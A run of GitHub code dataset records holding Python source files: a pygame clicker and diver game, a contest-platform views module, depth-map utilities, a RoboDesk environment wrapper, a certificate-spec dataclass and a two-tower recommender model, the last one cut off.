item.y = item_base_y_pos + item.item_type * 100\n\n\n# Draw basic objects such as a rectangle\ndef draw_basic_objects(surface, objects):\n for basic_object in objects:\n basic_object.draw(surface, False)\n\n\n# Draw the buttons\ndef draw_buttons(surface, selected_object, buttons):\n for button in buttons:\n if button == selected_object:\n button.draw(surface, True)\n else:\n button.draw(surface, 
False)\n\n\n# buttons and other main components. This draws the first layer\ndef draw_main_objects_1(screen, selected_object, basic_objects_layer_1, buttons):\n\n surface1 = pygame.Surface(SCREEN_SIZE, pygame.SRCALPHA)\n draw_basic_objects(surface1, basic_objects_layer_1)\n\n surface3 = pygame.Surface(SCREEN_SIZE, pygame.SRCALPHA)\n draw_buttons(surface3, selected_object, buttons)\n\n surface1.blit(surface3, (0, 0))\n screen.blit(surface1, (0, 0))\n\n\n# buttons and other main components. This draws the second layer\ndef draw_main_objects_2(screen, basic_objects_layer_2):\n surface1 = pygame.Surface(SCREEN_SIZE, pygame.SRCALPHA)\n draw_basic_objects(surface1, basic_objects_layer_2)\n screen.blit(surface1, (0, 0))\n\n\n# Draws animated text and moves it every frame\ndef draw_animated_text(screen, animated_texts):\n surface = pygame.Surface(SCREEN_SIZE, pygame.SRCALPHA)\n\n indexes = [] # stuff to be removed\n for i in range(len(animated_texts)):\n animated_text = animated_texts[i]\n animated_text.draw(surface, False)\n remove = animated_text.move()\n if remove:\n indexes.append(i)\n\n for removal in indexes:\n animated_texts.pop(removal)\n\n screen.blit(surface, (0, 0))\n\n\n# Draw all the items and calculate their visibility\ndef draw_items(screen, selected_object, items, money):\n surface = pygame.Surface(SCREEN_SIZE, pygame.SRCALPHA)\n\n for item in items:\n item.hidden = item.item_type != 0 and item.hidden and money < ITEM_PRICES[item.item_type-1]\n\n item.enough = money >= item.price\n item.draw(surface, selected_object == item)\n\n screen.blit(surface, (0, 0))\n\n\n# Draw all the upgrades and calculate their visibility\ndef draw_upgrades(screen, selected_object, upgrades, money, upgrade_count):\n surface = pygame.Surface(SCREEN_SIZE, pygame.SRCALPHA)\n\n for upgrade in upgrades:\n upgrade.hidden = upgrade.purchased or upgrade_count < upgrade.upgrade_order\n upgrade.enough = money >= upgrade.price\n upgrade.draw(surface, selected_object == upgrade)\n\n screen.blit(surface, (0, 0))\n\n\n# Draw the item popup if it exists\ndef draw_item_popup(screen, item_popup):\n if item_popup is None:\n return\n\n surface = pygame.Surface(SCREEN_SIZE, pygame.SRCALPHA)\n item_popup.draw(surface, False)\n\n screen.blit(surface, (0, 0))\n\n\n# Draw the Upgrade popup if it exists\ndef draw_upgrade_popup(screen, upgrade_popup):\n if upgrade_popup is None:\n return\n\n surface = pygame.Surface(SCREEN_SIZE, pygame.SRCALPHA)\n upgrade_popup.draw(surface, False)\n\n screen.blit(surface, (0, 0))\n\n\n# Run the main function\nif __name__ == '__main__':\n main()\n","repo_name":"Alex2262/carbon_clicker","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":23394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"6541497909","text":"\nfrom datetime import datetime, timedelta\n\nfrom alkindi.errors import ModelError\nfrom alkindi.model.rounds import (\n load_round, load_rounds, find_round_ids_with_badges)\nfrom alkindi.model.round_tasks import load_round_tasks\nfrom alkindi.model.users import load_user, load_users\nfrom alkindi.model.teams import (\n load_team,\n count_teams_in_round,\n count_teams_in_round_region,\n count_teams_in_round_big_region)\nfrom alkindi.model.team_members import load_team_members\nfrom alkindi.model.regions import load_region\nfrom alkindi.model.participations import load_team_participations\nfrom alkindi.model.attempts import (\n load_participation_attempts, get_user_current_attempt_id)\nfrom 
alkindi.model.access_codes import load_unlocked_access_codes\nfrom alkindi.model.task_instances import load_user_task_instance\nfrom alkindi.model.answers import load_limited_attempt_answers\nfrom alkindi.model.workspace_revisions import (\n load_user_latest_revision_id, load_attempt_revisions)\nfrom alkindi.model.workspaces import load_workspaces\n\n\nAllowHtmlAttrs = {\n '*': ['class'],\n 'a': ['href', 'title'],\n}\n\nAllowHtmlTags = [\n 'div', 'span', 'p', 'ul', 'ol', 'li', 'h1', 'h2', 'h3',\n 'b', 'i', 'strong', 'em'\n]\n\n\ndef view_requesting_user(\n db, user_id=None, participation_id=None, attempt_id=None,\n is_admin=False):\n\n now = datetime.utcnow()\n view = {\n 'now': now,\n 'is_admin': is_admin\n }\n if user_id is None:\n return view\n\n #\n # Add the user.\n #\n user = load_user(db, user_id)\n if user is None:\n return view\n view['user_id'] = user_id\n view['user'] = view_user(user)\n team_id = user['team_id']\n\n #\n # Quick return path when the user has no team.\n #\n if team_id is None:\n # If the user has no team, we look for a round to which a\n # badge grants access.\n badges = user['badges']\n round_ids = find_round_ids_with_badges(db, badges, now)\n if len(round_ids) > 0:\n # TODO: resolve this somehow, for example by returning\n # the round views to the user and letting them choose.\n # For now, pick the first one (which has the greatest id).\n round_id = round_ids[0]\n round_ = load_round(db, round_id, now)\n view['round'] = view_round(round_)\n return view\n\n #\n # Add the team and team members.\n #\n team = load_team(db, team_id)\n members = load_team_members(db, team['id'], users=True)\n team_view = view['team'] = view_team(team, members)\n\n #\n # Add the team's participations.\n #\n participations = load_team_participations(db, team_id)\n round_ids = set()\n for participation in participations:\n round_ids.add(participation['round_id'])\n rounds = load_rounds(db, round_ids, now)\n view['participations'] = [\n view_team_participation(\n participation,\n rounds[participation['round_id']])\n for participation in participations\n ]\n if len(participations) == 0:\n return view\n\n # Mark the lastest (or selected) participation as current.\n if participation_id is None:\n participation = participations[-1]\n else:\n participation = get_by_id(participations, participation_id)\n if participation is None:\n return view\n view['participation_id'] = participation['id']\n for pview in view['participations']:\n if pview['id'] == participation['id']:\n pview['is_current'] = True\n\n #\n # Add the current participation's round.\n #\n round_id = participation['round_id']\n round_ = rounds[round_id]\n view['round'] = view_round(round_)\n\n #\n # Add the tasks for the current round.\n #\n round_tasks = load_round_tasks(db, round_id)\n view['round']['task_ids'] = [str(rt['id']) for rt in round_tasks]\n round_task_views = view['round_tasks'] = {\n str(rt['id']): view_round_task(rt) for rt in round_tasks\n }\n\n region_id = team['region_id']\n\n if round_['status'] == 'closed' and team['region_id'] is not None:\n region = load_region(db, region_id)\n national_count = count_teams_in_round(db, round_id)\n big_region_count = count_teams_in_round_big_region(\n db, round_id, region['big_region_code'])\n region_count = count_teams_in_round_region(db, round_id, region_id)\n view['ranking'] = {\n 'national': {\n 'rank': participation['rank_national'],\n 'count': national_count\n },\n 'big_region': {\n 'name': region['big_region_name'],\n 'rank': participation['rank_big_regional'],\n 
'count': big_region_count\n },\n 'region': {\n 'name': region['name'],\n 'rank': participation['rank_regional'],\n 'count': region_count\n }\n }\n\n # XXX A team's validity should be checked against settings for a\n # competition rather than a round.\n causes = validate_members_for_round(members, round_)\n team_view['round_access'] = list(causes.keys())\n team_view['is_invalid'] = len(causes) != 0\n\n # Do not return attempts if the team is invalid.\n if team_view['is_invalid']:\n return view\n\n # Load the participation attempts.\n attempts = load_participation_attempts(db, participation['id'], now)\n view_task_attempts(attempts, round_task_views)\n print(\"attempts {} {}\".format(attempt_id, attempts))\n\n # Find the requested attempt.\n current_attempt = get_by_id(attempts, attempt_id)\n if current_attempt is None:\n return view\n view['attempt_id'] = attempt_id\n\n # Focus on the current attempt.\n current_round_task = round_task_views[str(current_attempt['round_task_id'])]\n current_attempt_view = None\n for attempt_view in current_round_task['attempts']:\n if attempt_id == attempt_view.get('id'):\n current_attempt_view = attempt_view\n view['attempt'] = current_attempt_view\n view['round_task'] = current_round_task # XXX duplicates attempts :(\n\n if False: # Access codes are disabled\n members_view = view['team']['members']\n access_codes = load_unlocked_access_codes(db, attempt_id)\n add_members_access_codes(members_view, access_codes)\n if current_attempt['is_training']:\n needs_codes = not have_one_code(members_view)\n else:\n needs_codes = not have_code_majority(members_view)\n current_attempt_view['needs_codes'] = needs_codes\n\n # Add task instance data, if available.\n try:\n # XXX Previously load_task_instance_team_data which did not parse\n # full_data.\n # /!\\ task contains sensitive data\n # XXX If the round is closed, load and pass full_data?\n task_instance = load_user_task_instance(db, attempt_id)\n except ModelError:\n return view\n\n # If the round has a time limit, return the countdown.\n if round_['duration'] is not None:\n started_at = participation['started_at']\n if started_at is not None:\n duration = timedelta(minutes=round_['duration'])\n countdown = started_at + duration\n view['countdown'] = started_at + duration\n if countdown < now:\n return view\n\n view['team_data'] = task_instance['team_data']\n\n # Add a list of the workspace revisions for this attempt.\n add_revisions(db, view, attempt_id)\n\n # Give the user the id of their latest revision for the\n # current attempt, to be loaded into the crypto tab on\n # first access.\n revision_id = load_user_latest_revision_id(\n db, user_id, attempt_id)\n view['my_latest_revision_id'] = revision_id\n\n return view\n\n\ndef get_by_id(items, id):\n try:\n return next(item for item in items if item['id'] == id)\n except StopIteration:\n return None\n\n\ndef view_user(user):\n \"\"\" Return the user-view for a user.\n \"\"\"\n keys = ['id', 'username', 'firstname', 'lastname']\n return {key: user[key] for key in keys}\n\n\ndef view_team(team, members):\n \"\"\" Return the user-view for a team.\n \"\"\"\n keys = ['id', 'code', 'is_open', 'is_locked']\n result = {key: team[key] for key in keys}\n result['members'] = members\n creators = [m for m in members if m['is_creator']]\n if len(creators) > 0:\n result['creator'] = creators[0]['user']\n return result\n\n\ndef view_region(region):\n keys = ['id', 'name']\n return {key: region[key] for key in keys}\n\n\ndef add_members_access_codes(members, access_codes):\n 
code_map = {code['user_id']: code for code in access_codes}\n for member in members:\n user_id = member['user_id']\n if user_id in code_map:\n member['access_code'] = code_map[user_id]['code']\n\n\ndef have_one_code(members):\n n_codes = len([m for m in members if 'access_code' in m])\n return n_codes >= 1\n\n\ndef have_code_majority(members):\n n_members = len(members)\n n_codes = len([m for m in members if 'access_code' in m])\n return n_codes * 2 >= n_members\n\n\ndef validate_members_for_round(members, round_):\n \"\"\" Return a dict whose keys indicate reasons why the given\n team members cannot start training for the given round.\n \"\"\"\n result = {}\n n_members = len(members)\n n_qualified = len([m for m in members if m['is_qualified']])\n if n_members < round_['min_team_size']:\n result['team_too_small'] = True\n if n_members > round_['max_team_size']:\n result['team_too_large'] = True\n if n_qualified < n_members * round_['min_team_ratio']:\n result['insufficient_qualified_users'] = True\n return result\n\n\ndef view_round(round_):\n \"\"\" Return the user-view for a round.\n \"\"\"\n keys = [\n 'id', 'title', 'status',\n 'registration_opens_at', 'is_registration_open',\n 'training_opens_at', 'is_training_open',\n 'min_team_size', 'max_team_size', 'min_team_ratio',\n 'allow_team_changes'\n ]\n return {key: round_[key] for key in keys}\n\n\ndef view_team_participation(participation, round_):\n view = {\n 'id': participation['id'],\n 'created_at': participation['created_at'],\n 'round': view_round(round_),\n 'is_qualified': participation['is_qualified'],\n 'score': participation['score']\n }\n if participation['access_code'] is not None:\n if participation['access_code_entered']:\n view['access_code'] = 'provided'\n else:\n view['access_code'] = 'required'\n return view\n\n\ndef view_user_workspace_revision(workspace_revision):\n return workspace_revision\n\n\ndef view_user_task(db, user_id):\n attempt_id = get_user_current_attempt_id(db, user_id)\n return load_task_instance_team_data(db, attempt_id)\n\n\ndef view_revision(revision):\n keys = [\n 'id', 'parent_id', 'creator_id', 'workspace_id',\n 'created_at', 'title', 'is_active', 'is_precious',\n ]\n return {key: revision[key] for key in keys}\n\n\ndef view_workspace(workspace):\n keys = [\n 'id', 'created_at', 'updated_at', 'title'\n # 'attempt_id' omitted\n ]\n return {key: workspace[key] for key in keys}\n\n\ndef add_revisions(db, view, attempt_id):\n # Load revisions.\n revisions = load_attempt_revisions(db, attempt_id)\n # Load related entities.\n user_ids = set()\n workspace_ids = set()\n for revision in revisions:\n user_ids.add(revision['creator_id'])\n workspace_ids.add(revision['workspace_id'])\n users = load_users(db, user_ids)\n workspaces = load_workspaces(db, workspace_ids)\n # Prepare views.\n view['users'] = [view_user(user) for user in users]\n view['workspaces'] = \\\n [view_workspace(workspace) for workspace in workspaces]\n view['revisions'] = revisions\n\n\ndef add_answers(db, view, attempt_id):\n answers = load_limited_attempt_answers(db, attempt_id)\n hide_scores = view['round']['hide_scores']\n view['answers'] = [view_answer(answer, hide_scores) for answer in answers]\n user_ids = set()\n for answer in answers:\n user_ids.add(answer['submitter_id'])\n users = load_users(db, user_ids)\n user_views = [view_user(user) for user in users]\n view['users'] = user_views\n\n\ndef view_round_task(round_task):\n view = {\n 'attempts': []\n }\n fields = [\n 'id', 'task_id', 'title', 'frontend_url',\n 
'have_training_attempt', 'max_timed_attempts', 'hide_scores',\n 'attempt_duration', 'max_attempt_answers', 'max_score',\n ]\n for key in fields:\n view[key] = round_task[key]\n return view\n\n\ndef view_task_attempts(attempts, round_task_views):\n # Add each attempt's view to its round_task's view.\n for attempt in attempts:\n round_task_id = str(attempt['round_task_id'])\n round_task_view = round_task_views[round_task_id]\n attempt_view = view_attempt(attempt, round_task_view)\n round_task_view['attempts'].append(attempt_view)\n\n\ndef view_answer(answer, hide_scores):\n view = {}\n cols = [\n 'id', 'submitter_id', 'ordinal', 'created_at', 'answer']\n if not hide_scores:\n cols.append('score')\n cols.append('is_solution')\n cols.append('is_full_solution')\n for col in cols:\n view[col] = answer[col]\n return view\n\n\ndef view_attempt(attempt, round_task_view):\n print('view_attempt {} {}'.format(attempt, round_task_view))\n keys = [\n 'id', 'ordinal', 'created_at', 'started_at', 'closes_at',\n 'is_current', 'is_training', 'is_unsolved', 'is_fully_solved',\n 'is_closed', 'is_completed'\n ]\n view = {key: attempt[key] for key in keys}\n if not attempt['is_training']:\n view['duration'] = round_task_view['attempt_duration']\n if not round_task_view['hide_scores']:\n view['score'] = score = attempt['max_score']\n view['ratio'] = score / round_task_view['max_score'] \\\n if score is not None else None\n return view\n","repo_name":"France-ioi/alkindi-backend","sub_path":"alkindi/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":13995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"73526972991","text":"import numpy as np\nimport cv2\n\ndef make_depth_sparse(depth_map, depth_percentage):\n\n i, j = np.indices(depth_map.shape)\n coordinates = np.hstack((i.reshape((-1,1)), j.reshape((-1,1))))\n total_pixels = coordinates.shape[0]\n\n random_coordinate_ids = np.random.permutation(total_pixels)\n selected_pixels = coordinates[random_coordinate_ids[:int(total_pixels*(100-depth_percentage)/100)]]\n\n sparse_depth = depth_map.copy()\n sparse_depth[selected_pixels[:,0],selected_pixels[:,1]] = 0\n\n return sparse_depth\n\ndef draw_depth(depth_map, max_dist):\n\n norm_depth_map = 255*(1-depth_map/max_dist)\n norm_depth_map[norm_depth_map < 0] =0\n norm_depth_map[depth_map == 0] =0\n\n return cv2.applyColorMap(cv2.convertScaleAbs(norm_depth_map,1), cv2.COLORMAP_MAGMA)\n\ndef update_depth_density(depth_density, depth_density_rate, min_density=0.5, max_density=10):\n\n if depth_density <= min_density or depth_density >= max_density:\n depth_density_rate = -depth_density_rate\n\n depth_density += depth_density_rate\n\n return depth_density, depth_density_rate","repo_name":"PINTO0309/PINTO_model_zoo","sub_path":"160_msg_chn_wacv20/demo/msg_chn_wacv20/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":2990,"dataset":"github-code","pt":"60"} +{"seq_id":"37238777062","text":"from typing import Optional\n\nimport numpy as np\nfrom rlds_creator import environment\nfrom rlds_creator import gym_utils\nfrom rlds_creator import input_utils\nfrom rlds_creator import study_pb2\nfrom robodesk import robodesk\n\n\n# Width and height of the camera. 
This is not used for the image observations.\n# It should be smaller than the size of the offscreen buffer.\nCAMERA_SIZE = 480\n\nRoboDeskSpec = study_pb2.EnvironmentSpec.RoboDesk\n\n# Mapping from reward enums to the string representations.\n_REWARD = {\n RoboDeskSpec.REWARD_DENSE: 'dense',\n RoboDeskSpec.REWARD_SPARSE: 'sparse',\n RoboDeskSpec.REWARD_SUCCESS: 'success',\n}\n\n# Mapping from actions to the corresponding keys.\n_ACTION_MAPPING = [\n (np.array([-1., 0, 0, 0, 0]), ['a', 'Left']),\n (np.array([+1., 0, 0, 0, 0]), ['d', 'Right', 'Axis0']),\n (np.array([0, +1., 0, 0, 0]), ['w', 'Up']),\n (np.array([0, -1., 0, 0, 0]), ['s', 'Down', 'Axis1']),\n (np.array([0, 0, +1., 0, 0]), ['r', 'Button6']),\n (np.array([0, 0, -1., 0, 0]), ['f', 'Button7']),\n # Rotates the hand.\n (np.array([0, 0, 0, +1., 0]), ['q', 'Button4']),\n (np.array([0, 0, 0, -1., 0]), ['e', 'Button5']),\n # Opens and closes the gripper.\n (np.array([0, 0, 0, 0, +1.]), ['t', 'Button2']),\n (np.array([0, 0, 0, 0, -1.]), ['g', 'Button1']),\n]\n\n# Mapping from keys to the actions.\n_KEY_MAPPING = {key: action for action, keys in _ACTION_MAPPING for key in keys}\n\n# Default camera is (mostly) top-view and is the original setting in RoboDesk.\n_CAMERAS = [\n ('default', {\n 'distance': 1.8,\n 'azimuth': 90,\n 'elevation': -60\n }),\n ('sideview', {\n 'distance': 1.8,\n 'azimuth': 0,\n 'elevation': -60\n }),\n]\n\nfrom dm_control import mujoco\nfrom PIL import Image\n\n\nclass RoboDesk(robodesk.RoboDesk):\n \"\"\"RoboDesk environment with parametric rendering.\"\"\"\n\n def render(self, mode='rgb_array', resize=True, params=None):\n if params is None:\n params = {'size': 120, 'crop_box': (16.75, 25.0, 105.0, 88.75)}\n params.update(_CAMERAS[0][1])\n\n camera = mujoco.Camera(\n physics=self.physics,\n height=params['size'],\n width=params['size'],\n camera_id=-1)\n camera._render_camera.distance = params['distance']\n camera._render_camera.azimuth = params['azimuth']\n camera._render_camera.elevation = params['elevation']\n camera._render_camera.lookat[:] = [0, 0.535, 1.1]\n\n image = camera.render(depth=False, segmentation=False)\n camera._scene.free()\n\n if resize:\n image = Image.fromarray(image).crop(box=params['crop_box'])\n image = image.resize([self.image_size, self.image_size],\n resample=Image.ANTIALIAS)\n image = np.asarray(image)\n return image\n\n\nclass RoboDeskEnvironment(gym_utils.GymEnvironment):\n \"\"\"A RoboDesk environment.\"\"\"\n\n def __init__(self, env_spec: study_pb2.EnvironmentSpec):\n args = env_spec.robodesk\n reward = _REWARD.get(args.reward)\n if not reward:\n raise ValueError('Unsupported reward type.')\n\n gym_env = RoboDesk(\n task=args.task,\n reward=reward,\n action_repeat=args.action_repeat,\n episode_length=env_spec.max_episode_steps,\n image_size=args.image_size)\n # Use the default camera.\n self.set_camera(0)\n\n super().__init__(gym_env)\n\n def keys_to_action(self, keys: environment.Keys) -> np.ndarray:\n keys = input_utils.get_mapped_keys(keys, input_utils.DEFAULT_BUTTON_MAPPING)\n action = np.zeros(5)\n for key, value in keys.items():\n if key in _KEY_MAPPING:\n action += _KEY_MAPPING[key] * value\n return action\n\n def render(self) -> environment.Image:\n # We use a larger image size and camera specific rendering parameters.\n # Cropping, which is enabled by resize, is also disabled.\n params = {'size': CAMERA_SIZE}\n params.update(self._render_params)\n return self._renderer.render(params=params, resize=False)\n\n def set_camera(self, index: int) -> 
Optional[environment.Camera]:\n if index >= len(_CAMERAS):\n return None\n name, self._render_params = _CAMERAS[index]\n return environment.Camera(index=index, name=name)\n","repo_name":"google-research/rlds-creator","sub_path":"rlds_creator/envs/robodesk_env.py","file_name":"robodesk_env.py","file_ext":"py","file_size_in_byte":4154,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"60"} +{"seq_id":"1852628753","text":"import pygame,random\n\n\ndef inicializa():\n pygame.init()\n w = pygame.display.set_mode((1080,600))\n pygame.key.set_repeat(50)\n\n assets = {\n 'player': pygame.image.load('mergulhador.png'),\n 'fundo' : pygame.image.load('fundo2.png'),\n 'tubarao': pygame.image.load('tubarao_mini.png'),\n 'fundo_inicio': pygame.image.load('TELA_INICIAL_JOGO.jpg'),\n 'fundo_final': pygame.image.load('TELA_FINAL_JOGO.jpg')\n }\n\n state = {\n \"merg_x\" : 0,\n \"merg_y\" : 0,\n \"tub_x\" : 600,\n \"tub_y\" : 0,\n \"fundo_inicio2\": assets['fundo_inicio'],\n \"fundo_final2\": assets['fundo_final']\n }\n\n\n state['last_updated'] = 0\n\n\n return w, assets, state\n\n\n\ndef finaliza():\n pygame.quit()\n\n\n\ndef recebe_eventos(state):\n pos = pygame.mouse.get_pos()\n print(pos)\n valor = pygame.time.get_ticks()\n for ev in pygame.event.get():\n if ev.type == pygame.QUIT:\n return False\n if ev.type == pygame.KEYDOWN:\n if ev.key == pygame.K_RIGHT:\n state[\"merg_x\"] += 12\n if ev.key == pygame.K_UP:\n state[\"merg_y\"] -= 12\n if ev.key == pygame.K_LEFT:\n state[\"merg_x\"] -= 12\n if ev.key == pygame.K_DOWN:\n state[\"merg_y\"] += 12\n if state[\"merg_y\"] > 550:\n state[\"merg_y\"] -= 12\n if state['merg_y'] < 0:\n state[\"merg_y\"] += 12\n if state['merg_x'] > 990:\n state['merg_x'] -= 12\n if state['merg_x'] < 0:\n state['merg_x'] += 12\n if ev.type == pygame.MOUSEBUTTONUP: \n if pos[0] >= 336 and pos[0] <= 781 and pos[1] >= 378 and pos[1] <= 431:\n assets['fundo_inicio'] == False\n assets['fundo'] == True\n pygame.display.update()\n state['last_updated'] = valor\n\n\n\n\n return True\n\n\ndef desenha(window, assets, state):\n window.fill((255,255,0))\n window.blit(assets['fundo_inicio'], (0,0))\n window.blit(assets[\"fundo\"], (0,0))\n window.blit(assets[\"player\"], (state[\"merg_x\"],state[\"merg_y\"]))\n window.blit(assets[\"tubarao\"], (state[\"tub_x\"],state[\"tub_y\"]))\n state[\"tub_x\"] -= 10\n if state['tub_x'] == -500:\n state['tub_y'] = random.randint(80,250)\n state['tub_x'] = 920\n state['tub_x'] -= 10\n return False\n pygame.display.update()\n\n\n\ndef gameloop(window, assets, state):\n while recebe_eventos(state):\n desenha(window, assets, state)\n\n\nif __name__ == '__main__':\n window, assets, state = inicializa()\n gameloop(window, assets, state)\n finaliza()","repo_name":"leoscarlato/pygame","sub_path":"jogo/jogo.py","file_name":"jogo.py","file_ext":"py","file_size_in_byte":2689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"14806867064","text":"from dataclasses import dataclass\nfrom typing import Optional\n\nfrom ..common import CertLabel, EntityLabel, KeyLabel\nfrom .general import IssuedItemSpec\n\nEXCLUDED_FROM_TEMPLATE = frozenset(\n {'subject', 'subject_key', 'serial', 'certificate_file'}\n)\nEXTNS_EXCLUDED_FROM_TEMPLATE = frozenset({'subject_alt_name'})\n\n\n@dataclass(frozen=True)\nclass CertificateSpec(IssuedItemSpec):\n \"\"\"Certificate specification.\"\"\"\n\n label: CertLabel\n \"\"\"Internal name of the certificate spec.\"\"\"\n\n subject: 
EntityLabel\n \"\"\"Certificate subject\"\"\"\n\n subject_key: KeyLabel\n \"\"\"Subject's (public) key. Defaults to the value of :attr:`subject`.\"\"\"\n\n templatable_config: dict\n \"\"\"Configuration that can be reused by other certificate specs.\"\"\"\n\n certificate_file: Optional[str] = None\n \"\"\"\n Path to a file with a pre-generated copy of the certificate in question,\n either in DER or in PEM format.\n\n When the certificate determined by this certificate spec is requested,\n the certificate in the file will be returned.\n\n .. warning::\n Certomancer will not attempt to process any information from the\n certificate file, beyond parsing it into an X.509 certificate structure.\n Internally, the certificate spec's entries are used instead.\n It is the config writer's responsibility to make sure that both match\n up.\n\n .. note::\n This option is unavailable when external configuration is disabled.\n Moreover, it is excluded from templates derived from this certificate\n spec.\n \"\"\"\n\n @property\n def self_issued(self) -> bool:\n \"\"\"\n Check whether the corresponding certificate is self-issued,\n i.e. whether the subject and issuer coincide.\n\n .. warning::\n Self-issued and self-signed are two related, but very different\n notions. Not all self-issued certificates are self-signed (e.g.\n CA key rollover can be implemented using self-issued certificates),\n and in principle self-signed certificates need not be self-issued\n either (although that usually makes little sense in practice).\n :return:\n \"\"\"\n return self.subject == self.issuer\n\n @property\n def self_signed(self) -> bool:\n \"\"\"\n Check whether the produced certificate is self-signed,\n i.e. whether the signer's (public) key is the same as the subject key.\n \"\"\"\n return self.subject_key == self.authority_key\n\n @classmethod\n def extract_templatable_config(cls, config_dict):\n # Do this first for consistency, so we don't put processed values\n # into the template\n for k, v in config_dict.items():\n if k.replace('-', '_') in EXCLUDED_FROM_TEMPLATE:\n continue\n elif k == 'extensions':\n yield k, [\n ext_dict\n for ext_dict in v\n if ext_dict['id'] not in EXTNS_EXCLUDED_FROM_TEMPLATE\n ]\n else:\n yield k, v\n","repo_name":"MatthiasValvekens/certomancer","sub_path":"certomancer/registry/issued/cert.py","file_name":"cert.py","file_ext":"py","file_size_in_byte":3064,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"60"} +{"seq_id":"44808348460","text":"from csci567.utils.data_utils import *\n\nimport csv\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport pandas as pd\nimport pickle\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import Dataset\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm\n\n\n\n# key = article feature, val = size of embedding\nARTICLE_FEATURES_SIZE = {\n \"article_id\": 4,\n \"product_code\": 8,\n \"product_type_no\": 8,\n \"graphical_appearance_no\": 4,\n \"perceived_colour_master_id\": 4,\n \"index_group_no\": 4,\n \"garment_group_no\": 4,\n}\nARTICLE_FEATURES_LIST = list(ARTICLE_FEATURES_SIZE.keys())\n\n\ndef get_customer_purchases(transactions_df, after=\"2020-08-23\"):\n ''' returns purchases_df: customer_id -> list of purchased article_ids'''\n recent_purchases = transactions_df.loc[transactions_df.t_dat >= pd.to_datetime(after)]\n customers_index_dict = {cust_id: id for id, cust_id in enumerate(\n recent_purchases['customer_id'].unique())}\n articles_index_dict = {art_id: id for 
id, art_id in enumerate(\n recent_purchases['article_id'].unique())}\n return recent_purchases.groupby(\"customer_id\").article_id.apply(list).reset_index(), \\\n customers_index_dict, \\\n articles_index_dict\n\ndef get_object_features(articles_df):\n features_dicts = {}\n num_features = {}\n total_features = 0\n for object_feature in ARTICLE_FEATURES_LIST:\n unique_features = articles_df[object_feature].unique()\n total_features += len(unique_features)\n num_features[object_feature] = len(unique_features)\n feature_dict = {feature_val: id for id, feature_val in enumerate(\n unique_features)}\n features_dicts[object_feature] = feature_dict\n return features_dicts, num_features, total_features\n\ndef prepare_object_embed_idxs(articles_df, articles_features_dicts):\n article_embed_idxs = {}\n for _, article in articles_df.iterrows():\n article_embed_id = []\n for feature in ARTICLE_FEATURES_LIST:\n article_embed_id.append(articles_features_dicts[feature][article[feature]])\n article_embed_idxs[article[\"article_id\"]] = article_embed_id\n return article_embed_idxs\n\nclass PurchasesDataset(Dataset):\n '''dataset of purchases for contrastive learning'''\n def __init__(self, purchases_df, customers_index_dict, articles_index_dicts, device=None):\n self.device = torch.device(\n 'cuda' if torch.cuda.is_available() else 'cpu') if device is None else device\n self.customer_ids = purchases_df[\"customer_id\"].to_numpy()\n self.purchases_ids = purchases_df[\"article_id\"].to_numpy()\n self.customers_index_dict = customers_index_dict\n self.articles_index_dicts = articles_index_dicts\n\n def __len__(self):\n return len(self.customer_ids)\n\n def __getitem__(self, idx):\n customer_embed_id = self.customers_index_dict[self.customer_ids[idx]]\n customer_recent_purchase = self.articles_index_dicts[np.random.choice(self.purchases_ids[idx])]\n target_article_features_ids = self.articles_index_dicts[np.random.choice(self.purchases_ids[idx])]\n return torch.tensor([customer_embed_id, *customer_recent_purchase]).to(self.device), torch.tensor(target_article_features_ids).to(self.device)\n\n\nclass Encoder(nn.Module):\n '''Implements encoder to translate input embeddings into a meaningful representation'''\n def __init__(self, in_dim, out_dim, num_hidden_layers=1, hidden_layer_dim=32, activation=nn.LeakyReLU, device=None):\n super().__init__()\n self.device = torch.device(\n 'cuda' if torch.cuda.is_available() else 'cpu') if device is None else device\n linear_layers = nn.ModuleList()\n linear_layers.append(nn.Linear(in_dim, hidden_layer_dim))\n linear_layers.append(activation())\n for _ in range(num_hidden_layers):\n linear_layers.append(nn.Linear(hidden_layer_dim, hidden_layer_dim))\n linear_layers.append(activation())\n linear_layers.append(nn.Linear(hidden_layer_dim, out_dim))\n self.model = nn.Sequential(*linear_layers).to(self.device)\n\n def forward(self, x):\n return self.model(x)\n\n\nclass TwoTowerModel(nn.Module):\n '''Implements two tower contrastive learning'''\n def __init__(self, num_queries, num_features,\n query_embed_dim=8, input_embed_dim=36, representation_embed_dim=16, device=None):\n super().__init__()\n self.device = torch.device(\n 'cuda' if torch.cuda.is_available() else 'cpu') if device is None else device\n self.queries_embeddings = nn.Embedding(\n num_queries, query_embed_dim).to(self.device)\n self.objects_embeddings = nn.ModuleList(\n [nn.Embedding(num_features[feature], ARTICLE_FEATURES_SIZE[feature]) \\\n for feature in ARTICLE_FEATURES_LIST]).to(self.device)\n self.query_net = 
Encoder(\n query_embed_dim + input_embed_dim, representation_embed_dim, device=device).to(self.device)\n self.object_net = Encoder(\n input_embed_dim, representation_embed_dim, device=device).to(self.device)\n self.loss_criterion = nn.CrossEntropyLoss(reduction=\"mean\")\n\n def forward(self, contrastive_batch):\n queries, objects = contrastive_batch\n target_perm = torch.randperm(len(objects), requires_grad=False).to(self.device)\n objects = objects[target_perm]\n queries_id_latents = self.queries_embeddings(queries[:, 0])\n queries_purchase_latents = torch.cat(\n [self.objects_embeddings[i](queries[:, i+1]) for i in range(len(ARTICLE_FEATURES_LIST))], dim=-1)\n queries_latents = self.query_net(torch.cat((queries_id_latents, queries_purchase_latents), dim=-1))\n objects_latents = self.object_net(torch.cat(\n [self.objects_embeddings[i](objects[:, i]) for i in range(len(ARTICLE_FEATURES_LIST))], dim=-1))\n return torch.matmul(queries_latents, objects_latents.T), target_perm\n\n def predict(self, test_batch, topk):\n with torch.no_grad():\n 